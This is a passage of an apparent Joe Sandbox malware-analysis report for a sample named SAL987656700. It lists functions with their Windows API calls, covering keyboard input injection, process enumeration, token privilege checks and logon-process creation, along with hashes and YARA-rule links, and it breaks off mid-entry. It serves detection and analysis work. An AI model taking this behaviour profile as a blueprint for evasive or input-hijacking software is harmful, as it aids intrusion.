                                      • Opcode Fuzzy Hash: 601fc781279dcf46bbb8882b171e05518f55fa8c3ec96d9592069d85b1011af9
                                      • Instruction Fuzzy Hash: 7C411C35610614DFCB11EF19C544A5ABBF1FF89720B188498E95ADB762CB30FD40CB92
                                      Function 008BD8C3 Relevance: 6.1, APIs: 4, Instructions: 110COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • MultiByteToWideChar.KERNEL32(?,00000000,8BE85006,008A6D71,00000000,00000000,008A82D9,?,008A82D9,?,00000001,008A6D71,8BE85006,00000001,008A82D9,008A82D9), ref: 008BD910
                                      • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 008BD999
                                      • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 008BD9AB
                                      • __freea.LIBCMT ref: 008BD9B4
                                        • Part of subcall function 008B3820: RtlAllocateHeap.NTDLL(00000000,?,00951444), ref: 008B3852
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                      • String ID:
                                      • API String ID: 2652629310-0
                                      • Opcode ID: 57cd00746b1d29e8876be277bd4514c07c70d791b0caa26bf6739ba885773b10
                                      • Instruction ID: dc5d934bb8e1533633986ea8e1f5645022a9f1c60d64fe5363ef95f91380b926
                                      • Opcode Fuzzy Hash: 57cd00746b1d29e8876be277bd4514c07c70d791b0caa26bf6739ba885773b10
                                      • Instruction Fuzzy Hash: 4F31AB72A0060AABDF249F68DC45EEE7FA5FB41310B054168FC04EA2A0EB35DD55CBA1
                                      Function 009152C1 Relevance: 6.1, APIs: 4, Instructions: 104windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • SendMessageW.USER32(?,00001024,00000000,?), ref: 00915352
                                      • GetWindowLongW.USER32(?,000000F0), ref: 00915375
                                      • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00915382
                                      • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 009153A8
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: LongWindow$InvalidateMessageRectSend
                                      • String ID:
                                      • API String ID: 3340791633-0
                                      • Opcode ID: a5b29b62df92bb2d685142b138eb804203070122c4c9dbc949abe2fa8422294f
                                      • Instruction ID: e635b1d591247686fed94c80d975952475de9239077d82517361e560af5bf32b
                                      • Opcode Fuzzy Hash: a5b29b62df92bb2d685142b138eb804203070122c4c9dbc949abe2fa8422294f
                                      • Instruction Fuzzy Hash: 4A31C170B65A0CEFEB249A14CC15BE83769AB843D0F9B4102FA30971E1C7B499C2EB41
                                      Function 008EAB9C Relevance: 6.1, APIs: 4, Instructions: 103keyboardwindowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetKeyboardState.USER32(?,75A8C0D0,?,00008000), ref: 008EABF1
                                      • SetKeyboardState.USER32(00000080,?,00008000), ref: 008EAC0D
                                      • PostMessageW.USER32(00000000,00000101,00000000), ref: 008EAC74
                                      • SendInput.USER32(00000001,?,0000001C,75A8C0D0,?,00008000), ref: 008EACC6
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: KeyboardState$InputMessagePostSend
                                      • String ID:
                                      • API String ID: 432972143-0
                                      • Opcode ID: c1b514581bab8804ef9d322355fc16b66a851d758342543d4cb4539361e9ab73
                                      • Instruction ID: 2a566acb9456c1cafcfef1815e012b3cabc2c4f7f583201a520e0c33960b1b2e
                                      • Opcode Fuzzy Hash: c1b514581bab8804ef9d322355fc16b66a851d758342543d4cb4539361e9ab73
                                      • Instruction Fuzzy Hash: 26312870A44398AFEF38CB66CC047FA7BA5FB86B10F28421AE495D21D0C374A9859753
                                      Function 00917674 Relevance: 6.1, APIs: 4, Instructions: 102windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • ClientToScreen.USER32(?,?), ref: 0091769A
                                      • GetWindowRect.USER32(?,?), ref: 00917710
                                      • PtInRect.USER32(?,?,00918B89), ref: 00917720
                                      • MessageBeep.USER32(00000000), ref: 0091778C
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: Rect$BeepClientMessageScreenWindow
                                      • String ID:
                                      • API String ID: 1352109105-0
                                      • Opcode ID: 946d9230d940d9ed090db4bd53f92355c12719e0792f069827223cfb4361f8e9
                                      • Instruction ID: 930346727724c1a189a31811851dfafbc54a2258117ce7d78985303f3d91cf79
                                      • Opcode Fuzzy Hash: 946d9230d940d9ed090db4bd53f92355c12719e0792f069827223cfb4361f8e9
                                      • Instruction Fuzzy Hash: F2417A74B0921A9FCB01CF99D894FE9F7F9BB49315F1581A8E8149B2A1C730A981DB90
                                      Function 009116DA Relevance: 6.1, APIs: 4, Instructions: 101COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetForegroundWindow.USER32 ref: 009116EB
                                        • Part of subcall function 008E3A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 008E3A57
                                        • Part of subcall function 008E3A3D: GetCurrentThreadId.KERNEL32 ref: 008E3A5E
                                        • Part of subcall function 008E3A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,008E25B3), ref: 008E3A65
                                      • GetCaretPos.USER32(?), ref: 009116FF
                                      • ClientToScreen.USER32(00000000,?), ref: 0091174C
                                      • GetForegroundWindow.USER32 ref: 00911752
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                      • String ID:
                                      • API String ID: 2759813231-0
                                      • Opcode ID: 1a75b1625470bd885761102e4cc3670138044ab6755afa5d60248ccbfab9a2f5
                                      • Instruction ID: 10154b6ed062e1a1e4eec4dcf735ae68eb976d0f05e6f718a33fdd826ee106ec
                                      • Opcode Fuzzy Hash: 1a75b1625470bd885761102e4cc3670138044ab6755afa5d60248ccbfab9a2f5
                                      • Instruction Fuzzy Hash: 68313E71E00149AFDB00EFA9C885CEEBBFDFF48304B5080A9E515E7251EA319E45CBA1
                                      Function 008ED4DC Relevance: 6.1, APIs: 4, Instructions: 86processCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CreateToolhelp32Snapshot.KERNEL32 ref: 008ED501
                                      • Process32FirstW.KERNEL32(00000000,?), ref: 008ED50F
                                      • Process32NextW.KERNEL32(00000000,?), ref: 008ED52F
                                      • CloseHandle.KERNEL32(00000000), ref: 008ED5DC
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                      • String ID:
                                      • API String ID: 420147892-0
                                      • Opcode ID: af09afa84f08c34881a92afcee4200c057393484842a37a7593f231dffabf37c
                                      • Instruction ID: 0e086edd5fd0ddbb527797945510f3851dae77ea575c645418fe20939e747469
                                      • Opcode Fuzzy Hash: af09afa84f08c34881a92afcee4200c057393484842a37a7593f231dffabf37c
                                      • Instruction Fuzzy Hash: E6317E71108341AFD304EF58C885AAFBBE8FF99354F14092DF581D61A1EB71AA49CB93
                                      Function 008ED2C1 Relevance: 6.1, APIs: 4, Instructions: 78COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetFileAttributesW.KERNEL32(?,0091CB68), ref: 008ED2FB
                                      • GetLastError.KERNEL32 ref: 008ED30A
                                      • CreateDirectoryW.KERNEL32(?,00000000), ref: 008ED319
                                      • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,0091CB68), ref: 008ED376
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: CreateDirectory$AttributesErrorFileLast
                                      • String ID:
                                      • API String ID: 2267087916-0
                                      • Opcode ID: 2b60e8836fef948e3722896f3be39ee65f1d43fc5b3a2c0b0258cd06d7779e52
                                      • Instruction ID: c893fe436b23aa079b46667c3b51c99a3bebd3818672ea8c2cd496633502e29c
                                      • Opcode Fuzzy Hash: 2b60e8836fef948e3722896f3be39ee65f1d43fc5b3a2c0b0258cd06d7779e52
                                      • Instruction Fuzzy Hash: 952180746483419F8310EF29C8814AAB7E4FE56324F504A1DF499D73E1E730D94ACB93
                                      Function 008E1571 Relevance: 6.1, APIs: 4, Instructions: 78memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 008E1014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 008E102A
                                        • Part of subcall function 008E1014: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 008E1036
                                        • Part of subcall function 008E1014: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 008E1045
                                        • Part of subcall function 008E1014: RtlAllocateHeap.NTDLL(00000000,?,TokenIntegrityLevel), ref: 008E104C
                                        • Part of subcall function 008E1014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 008E1062
                                      • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 008E15BE
                                      • _memcmp.LIBVCRUNTIME ref: 008E15E1
                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 008E1617
                                      • HeapFree.KERNEL32(00000000), ref: 008E161E
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: Heap$InformationProcessToken$AllocateErrorFreeLastLookupPrivilegeValue_memcmp
                                      • String ID:
                                      • API String ID: 2182266621-0
                                      • Opcode ID: 7a95649e6852162e9e9b2d6058921dd669db45c4f932d5f24029a669e0024611
                                      • Instruction ID: b9aa53000584d452a6d57383bb9243b8645ebc9627c074f538161882cdbb6e62
                                      • Opcode Fuzzy Hash: 7a95649e6852162e9e9b2d6058921dd669db45c4f932d5f24029a669e0024611
                                      • Instruction Fuzzy Hash: A0215571E40208AFDF00DFA6C949BEEB7B8FF56354F088459E445EB251E730AA05DBA0
                                      Function 00912782 Relevance: 6.1, APIs: 4, Instructions: 75COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetWindowLongW.USER32(?,000000EC), ref: 0091280A
                                      • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00912824
                                      • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00912832
                                      • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00912840
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: Window$Long$AttributesLayered
                                      • String ID:
                                      • API String ID: 2169480361-0
                                      • Opcode ID: ebd7d3254c77ca071a1aaccc4b8602008b6718af55ea63fe27fae604ecfc37c8
                                      • Instruction ID: 3d8af9183c1bb04eef7987e9b0503b39c80ab26f1b5bb04b5c175dcc23db121a
                                      • Opcode Fuzzy Hash: ebd7d3254c77ca071a1aaccc4b8602008b6718af55ea63fe27fae604ecfc37c8
                                      • Instruction Fuzzy Hash: C821A131308519AFD714AB24C845FEA7B99EF86324F148158F426CB6E2CB75FC92CB91
                                      Function 008E78F5 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 71stringCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 008E8D7D: lstrlenW.KERNEL32(?,00000002,000000FF,?,?,?,008E790A,?,000000FF,?,008E8754,00000000,?,0000001C,?,?), ref: 008E8D8C
                                        • Part of subcall function 008E8D7D: lstrcpyW.KERNEL32(00000000,?,?,008E790A,?,000000FF,?,008E8754,00000000,?,0000001C,?,?,00000000), ref: 008E8DB2
                                        • Part of subcall function 008E8D7D: lstrcmpiW.KERNEL32(00000000,?,008E790A,?,000000FF,?,008E8754,00000000,?,0000001C,?,?), ref: 008E8DE3
                                      • lstrlenW.KERNEL32(?,00000002,000000FF,?,000000FF,?,008E8754,00000000,?,0000001C,?,?,00000000), ref: 008E7923
                                      • lstrcpyW.KERNEL32(00000000,?,?,008E8754,00000000,?,0000001C,?,?,00000000), ref: 008E7949
                                      • lstrcmpiW.KERNEL32(00000002,cdecl,?,008E8754,00000000,?,0000001C,?,?,00000000), ref: 008E7984
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: lstrcmpilstrcpylstrlen
                                      • String ID: cdecl
                                      • API String ID: 4031866154-3896280584
                                      • Opcode ID: f21e68b4f2af4d87ea038b540f9c08240797b94fe34d06d72b0c4565da3fa796
                                      • Instruction ID: 8f39b2f715b8fddfad99b29a0851448d99e019ed07b5bfe254de3254b5c1f281
                                      • Opcode Fuzzy Hash: f21e68b4f2af4d87ea038b540f9c08240797b94fe34d06d72b0c4565da3fa796
                                      • Instruction Fuzzy Hash: 1811293A304381AFCB156F3ACC44E7A77A5FF86350B10802AF906CB265EB35D801D751
                                      Function 00917CC2 Relevance: 6.1, APIs: 4, Instructions: 70COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetWindowLongW.USER32(?,000000F0), ref: 00917D0B
                                      • SetWindowLongW.USER32(00000000,000000F0,?), ref: 00917D2A
                                      • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00917D42
                                      • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,008FB7AD,00000000), ref: 00917D6B
                                        • Part of subcall function 00899BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00899BB2
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: Window$Long
                                      • String ID:
                                      • API String ID: 847901565-0
                                      • Opcode ID: 91c9e6096b34af5c2a69209ce74ea5cd986a6f7d91ed026f2d955bbad136026e
                                      • Instruction ID: 007a09edfd3778ecf72f0d59d2c49b452009a18482aff39cf82e905592225be5
                                      • Opcode Fuzzy Hash: 91c9e6096b34af5c2a69209ce74ea5cd986a6f7d91ed026f2d955bbad136026e
                                      • Instruction Fuzzy Hash: 9311C07531861AAFCB109F68EC04AE67BA9AF45364F158724F835C72F0D7308990DB90
                                      Function 00915660 Relevance: 6.1, APIs: 4, Instructions: 67windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • SendMessageW.USER32(?,00001060,?,00000004), ref: 009156BB
                                      • _wcslen.LIBCMT ref: 009156CD
                                      • _wcslen.LIBCMT ref: 009156D8
                                      • SendMessageW.USER32(?,00001002,00000000,?), ref: 00915816
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: MessageSend_wcslen
                                      • String ID:
                                      • API String ID: 455545452-0
                                      • Opcode ID: 42b3ee252756f22ca59bf9e7699badea4cbb528f49b051e185c2f2df1c4601ca
                                      • Instruction ID: 01ae2534a09b5ffa3d11324c8b40c3937207042aeaf6f4f787e73eb40f11859b
                                      • Opcode Fuzzy Hash: 42b3ee252756f22ca59bf9e7699badea4cbb528f49b051e185c2f2df1c4601ca
                                      • Instruction Fuzzy Hash: 0011E17170060CDADF209F66CC81AEE77ACEF913A4F524426F915D6091E7748AC0CBA1
                                      Function 008E14CE Relevance: 6.1, APIs: 4, Instructions: 64processCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 008E14FF
                                      • OpenProcessToken.ADVAPI32(00000000), ref: 008E1506
                                      • CloseHandle.KERNEL32(00000004), ref: 008E1520
                                      • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 008E154F
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: Process$CloseCreateCurrentHandleLogonOpenTokenWith
                                      • String ID:
                                      • API String ID: 2621361867-0
                                      • Opcode ID: 4cebfa33414c8e0c9f468e95ef703bdf2bf5275dba6cd0b0b408a25422208a7c
                                      • Instruction ID: 79ab608533d8f1f487975724a86f3f87f22432f4d39473a1f582c5b4c855a58d
                                      • Opcode Fuzzy Hash: 4cebfa33414c8e0c9f468e95ef703bdf2bf5275dba6cd0b0b408a25422208a7c
                                      • Instruction Fuzzy Hash: A2115CB260424DABDF118F94DD49BDE7BA9FF49708F048014FA05E21A0C3718E61EB60
                                      Function 008E1A27 Relevance: 6.1, APIs: 4, Instructions: 56windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • SendMessageW.USER32(?,000000B0,?,?), ref: 008E1A47
                                      • SendMessageW.USER32(?,000000C9,?,00000000), ref: 008E1A59
                                      • SendMessageW.USER32(?,000000C9,?,00000000), ref: 008E1A6F
                                      • SendMessageW.USER32(?,000000C9,?,00000000), ref: 008E1A8A
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
